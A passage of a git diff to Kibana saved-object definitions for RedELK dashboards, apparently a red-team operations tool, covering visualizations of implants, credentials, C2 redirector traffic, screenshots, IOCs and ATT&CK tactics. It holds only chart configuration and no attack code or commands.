table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2284], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.2", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2286], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.2", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2289], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2291], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2293], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.2", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2295], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.2", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2297], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.2", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2300], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2302], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2304], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2306], "type": "visualization", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1159], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1161], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1645363346672, 1162], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of 